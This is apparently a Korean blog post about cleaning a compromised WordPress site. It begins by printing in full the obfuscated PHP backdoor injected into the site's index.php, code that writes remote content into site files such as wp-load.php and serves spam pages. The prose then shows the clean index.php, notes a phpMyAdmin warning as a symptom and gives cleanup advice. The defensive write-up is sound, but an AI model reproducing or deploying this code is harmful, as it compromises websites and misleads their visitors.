LL=$FI88ILL8IL;if(substr($F8LIL8ILI8,0,${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x49\x4c\x4c\x38\x38\x49"]($F88IL8LILI.$FI88ILL8IL))==$F88IL8LILI.$FI88ILL8IL){$F88IL8LILI=$F88IL8LILI.$FI88ILL8IL;}$FI8LI8LLI8=\'www\';$FI8I8LL8IL=\'\';if(isset(${"_S\x45\x52\x56\x45R"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x53\x43\x48\x45\x4d\x45"])){$FI8I8LL8IL=${"_S\x45\x52\x56\x45R"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x53\x43\x48\x45\x4d\x45"];}$FI8L8ILL8I=(int)$FI8L8ILL8I;${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x4c\x4c\x38"](\'\',$FI8L8ILL8I,$FI88LII8LL,$FII88LIL8L);$FL8LII8I8L=$FI8LI8LLI8.$FI8LLII88L.${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($F88IIL8LLI);$F8I8LII8LL=$FI8LI8LLI8.${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($F8IL8LLII8);$FL8LI8I8LI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'FcRBChToAwDADB18SjUU8iiG8JFExFaLDx/7pzGM+MTVW89RQtljZPyzqGx1F26cNJSS85BT1kdFOli9rtPfBw==\');$FL88I8ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'FcRBChToAwDADB18SjUU8iiG8RBGNpabDp/3XnMBbhm6pYbSGaevF5WtbRzY9rlzbcFNTJyOmlkzI9lKjtP+fQ==\');$FLL8I8II8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yygpKhTbDS11fNyC8uUdXPTSxIy8xJ1SutPpKAEA\');$FL8LI8I8LI=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x38\x38\x4c\x49\x49\x4c\x49"]("/%host%/si",$FL8LII8I8L,$FL8LI8I8LI);$FLL8I8II8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x38\x38\x4c\x49\x49\x4c\x49"]("/%host%/si",$FL8LII8I8L,$FLL8I8II8L);$FILL8I8I8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'sykuShTMxLz7ctPDAA==\');$FIL8LII8L8=\'zlib\';$FLIIL8LI88=\'|\';$F8LLLI8II8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'y0+KThT6/KSMxLyUktPtAgA=\');if(isset(${"\x5fG\x45T"}["\x78\x78\x6e\x65\x77\x5f\x6d\x61\x70"])){$F8LIIL88LI=${"\x5fG\x45T"}["\x78\x78\x6e\x65\x77\x5f\x6d\x61\x70"];$F8ILILLI88=\'/\';if($F8LIIL88LI!=\'\'){${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x38\x4c\x49\x4c\x49"]($F8LIIL88LI,0755);$F8LIIL88LI =$F8LIIL88LI.$F8ILILLI88;}$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FLL8I8II8L);$FLL8II8I8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'|\',$FL8I88ILIL);$FL88I8IILL=\'end\';for($FLIII8L8L8=0;$FLIII8L8L8<${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x38\x49\x4c\x4c\x38\x49"]($FLL8II8I8L);$FLIII8L8L8++){$FLI8LI8IL8=sprintf($FL8LI8I8LI,$F8ILI8I8LL,$FI8LLII88L,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x4c\x4c\x49\x49\x38\x38"](\'Y-m-d h:i:s\')),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($F8ILILLI88.${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8])),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FI8I8LL8IL),${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLIII8L8L8pps) ,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FIIL8LI8L8),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FLII8IL88L),$FLLI8ILI88,$F88IL8LILI,0,$F8ILL8ILI8.$FLIIL8LI88.$FII88LIL8L);$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FLI8LI8IL8);$FL8LIIL88I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'09coyhTk/KLynW1NPSK6koUdEtPHAA==\');if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)&&${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x4c\x38\x49\x38\x49\x4c"]($FL8LIIL88I,${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8]))){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8]),$FL8I88ILIL);echo ${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8]).\'<br>\';}else if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"]($F8LIIL88LI.${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8]),$FL8I88ILIL);echo $F8LIIL88LI.${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8II8I8L[$FLIII8L8L8]).\'<br>\';}}echo $FL88I8IILL;unset($FL8I88ILIL,$FLL8II8I8L,$F8LIIL88LI);exit();}$FL8LI8I8LI=sprintf($FL8LI8I8LI,$F8ILI8I8LL,$FI8LLII88L,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x4c\x4c\x49\x49\x38\x38"](\'Y-m-d h:i:s\')),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($F8LIL8ILI8),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FI8I8LL8IL),${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLIII8L8L8pps) ,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FIIL8LI8L8),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FLII8IL88L),$FLLI8ILI88,$F88IL8LILI,0,$FII88LIL8L.$FLIIL8LI88.$F8LLIII88L);$FL88I8ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x38\x38\x4c\x49\x49\x4c\x49"]("/%host%/si",$F8I8LII8LL,$FL88I8ILIL);$FL88I8ILIL=sprintf($FL88I8ILIL,$F8ILI8I8LL,$FI8LLII88L,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x4c\x4c\x49\x49\x38\x38"](\'Y-m-d h:i:s\')),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($F8LIL8ILI8),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FI8I8LL8IL),${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLIII8L8L8pps) ,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FIIL8LI8L8),${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x4c\x38\x38"]($FLII8IL88L),$FLLI8ILI88,$F88IL8LILI,1,$FII88LIL8L.$FLIIL8LI88.$F8LLIII88L);$FL88LILI8I=isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])?${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\']:\'\';$F8LI8LILI8=isset(${"\x5fG\x45T"}[\'writerfi\'.\'lename\'])?${"\x5fG\x45T"}[\'writerfi\'.\'lename\']:\'\';if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){$F8LL8LI8II=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yygpKhTbDS108syNfLrcxNSdLLzEvtPL1wcA\');$FLII88LI8L=\'wp-l\'.\'oad.php\';$FI88LL8LII=\'up\'.\'.txt\';if($F8LI8LILI8!=\'\'){${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"]($F8IL8I8LLI,${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x4c\x38\x38\x49\x49\x49\x4c"]($FL88LILI8I).\'-\'.${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x4c\x38\x38\x49\x49\x49\x4c"]($F8LI8LILI8));$FLII88LI8L=$F8LI8LILI8;}$F8LII8LLI8=@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($F8IL8I8LLI);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($F8LII8LLI8)!=\'\'){$F8LII8LLI8=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'-\',$F8LII8LLI8);$FLII88LI8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x4c\x49\x49\x4c\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($F8LII8LLI8[1]));$FI88LL8LII=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x4c\x49\x49\x4c\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($F8LII8LLI8[0]));}$FLIL8I88IL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'Ky/QThTcrJT9fNSE1MSS0tPCAA==\');$F8IILLL88I=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'|\',$FLII88LI8L);$F88LILI8LI=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'|\',$FI88LL8LII);for($F88IIL8LIL=0;$F88IIL8LIL<${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x38\x49\x4c\x4c\x38\x49"]($F8IILLL88I);$F88IIL8LIL++){$FLII88LI8L=$F8IILLL88I[$F88IIL8LIL];if(${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x38\x49\x4c\x4c\x38\x49"]($F88LILI8LI)<=$F88IIL8LIL){$FI88LL8LII=$F88LILI8LI[${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x38\x49\x4c\x4c\x38\x49"]($F88LILI8LI)-1];}else{$FI88LL8LII=$F88LILI8LI[$F88IIL8LIL];}$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($F8LL8LI8II.$FI88LL8LII);$FLI88L8LII=substr($FLII88LI8L,-${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x49\x4c\x4c\x38\x38\x49"]($FLII88LI8L),${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x4c\x49\x38\x4c\x38\x38\x49"]($FLII88LI8L,\'/\'));if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x4c\x38\x49\x38\x49\x38"]($FLI88L8LII)&&$FLI88L8LII!=\'\'){mkdir ($FLI88L8LII,0755,true);}$F8LILI8I8L=@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($FLII88LI8L);if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($F8LILI8I8L,$FLIL8I88IL)){@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x49\x4c\x38\x49\x38\x4c"]($FLII88LI8L,0644);${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"]($FLII88LI8L,$FL8I88ILIL.$F8LILI8I8L);}}}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){echo $FL8LI8I8LI;exit();}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url2\'])){echo $FL88I8ILIL;exit();}if(isset(${"\x5fG\x45T"}["\x77\x65\x62\x6d\x61\x73\x74\x65\x72\x73\x5f\x75\x72\x6c"])){$FILLLI88I8=${"\x5fG\x45T"}["\x77\x65\x62\x6d\x61\x73\x74\x65\x72\x73\x5f\x75\x72\x6c"];$FL8I8LI8IL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yygpKhTSi20tcvLy/XS8/PT89J1UvOz9UvT03KTSwuSS0q1i/OLEnNTSwo1i/IzEu3h/JtPsAQ==\').$FILLLI88I8;$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($FL8I8LI8IL);echo $FL8I88ILIL;exit();}$FLLI8II88L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yyhJThTM7tPPBgA=\');$FLLI8II88L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yyhJThTM7tPLBwA=\');if(isset(${"\x5fG\x45T"}["\x68\x74\x61\x63"])){$F8LI8L8ILI=${"\x5fG\x45T"}["\x68\x74\x61\x63"];if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x38\x49\x4c\x4c\x38\x49"]($F8LI8L8ILI)){echo $FLLI8II88L;}else{echo $FLLI8II88L;}exit();}$FL8LIIL88I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'09coyhTk/KLynW1NPSK6koUdEtPHAA==\');if(${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x4c\x38\x49\x38\x49\x4c"]($FL8LIIL88I,$F8LIL8ILI8)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FL8LI8I8LI);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);$FL8LILII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S87PKhT0nNK9EtqSwtPAAA==\').\'e:text/txt\';@header($FL8LILII88);echo $FL8I88ILIL;unset($FL8I88ILIL,$FL8LI8I8LI,$F8LIL8ILI8,$F8ILI8I8LL,$FIIL8LI8L8,$FLII8IL88L);exit();}}$F8ILILI8L8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'09cozhTixJzU0s0NTT0qvIzVHtPRBwA=\');if(${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x4c\x38\x49\x38\x49\x4c"]($F8ILILI8L8,$F8LIL8ILI8)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FL8LI8I8LI);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);$FL8LILII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S87PKhT0nNK9EtPtqQQA\').\'pe:text/xml\';@header($FL8LILII88);echo $FL8I88ILIL;unset($FL8I88ILIL,$FL8LI8I8LI,$F8LIL8ILI8,$F8ILI8I8LL,$FIIL8LI8L8,$FLII8IL88L);exit();}}if($FLIIL8L88I){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FL8LI8I8LI);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);echo $FL8I88ILIL;unset($FL8I88ILIL,$F8LIL8ILI8,$F8ILI8I8LL,$FIIL8LI8L8,$FLII8IL88L);exit();}}if($FLI88LLII8){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($FL88I8ILIL);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FL8I88ILIL,$FILL8I8I8L)){$FL8I88ILIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FILL8I8I8L,\'\',$FL8I88ILIL);echo $FL8I88ILIL;unset($FL8I88ILIL,$F8LIL8ILI8,$F8ILI8I8LL,$FIIL8LI8L8,$FLII8IL88L);exit();}}');${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x38\x49\x4c\x4c\x38\x38\x49\x4c"]();?>
아는 사람은 알겠지만, 일반적으로 루트폴더 속 Index.php에는 위와 같은 명령어는 들어 있지 않고, 대체로 아래와 같이 심플하게 되어 있다.
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );?>
구글링을 해도 위와 같은 명령어에 대한 해결책이나 포스팅이 전무했다. 그래서 혼자 파악해야 하는데, 루트폴더에 설치된 phpMyadmin을 통해서 하느 예측해 볼 수 있었다. 위의 메시지가 추가되고 나서 phpMyadmin에 접속하니 아래와 같은 메시지가 떴다.
"There is mismatch between HTTPS indicated on the server and client. This can lead to non working phpMyAdmin or a security risk. Please fix your server configuration to indicate HTTPS properly."
간단히 말해서 "php - 서버와 클라이언트에 표시된 HTTPS가 일치하지 않습니다"라는 말이다. 워드프레스로 경로를 설정해야하는 index.php에 다른 명령어가 들어 있어서 뭔가 메시지를 출력한듯 하다. 반대로 phpMyadmin에 위의 같은 메시지가 뜬다면, index.php 의 문제를 의심해 볼 수 있다.
여하튼 해결 방법은 간단하다. index.php 상단의 명령어를 삭제해주면 된다. 하지만, 악성파일이 여전히 있다면 다시 생겨날 가능성이 있기 때문에 필자가 지난 포스팅에도 남겼듯이 1. 평소에 보지 못했던 폴더가 생성되어 있는지 체크하고, 2. 워드프레스 폴더 및 파일 권한 설정을 강화해야 하며, 3. 이러한 사태에 대비해 늘 백업본을 가지고 있어야 한다. 이에 대한 자세한 내용은 여기를 참고하길 바란다.
댓글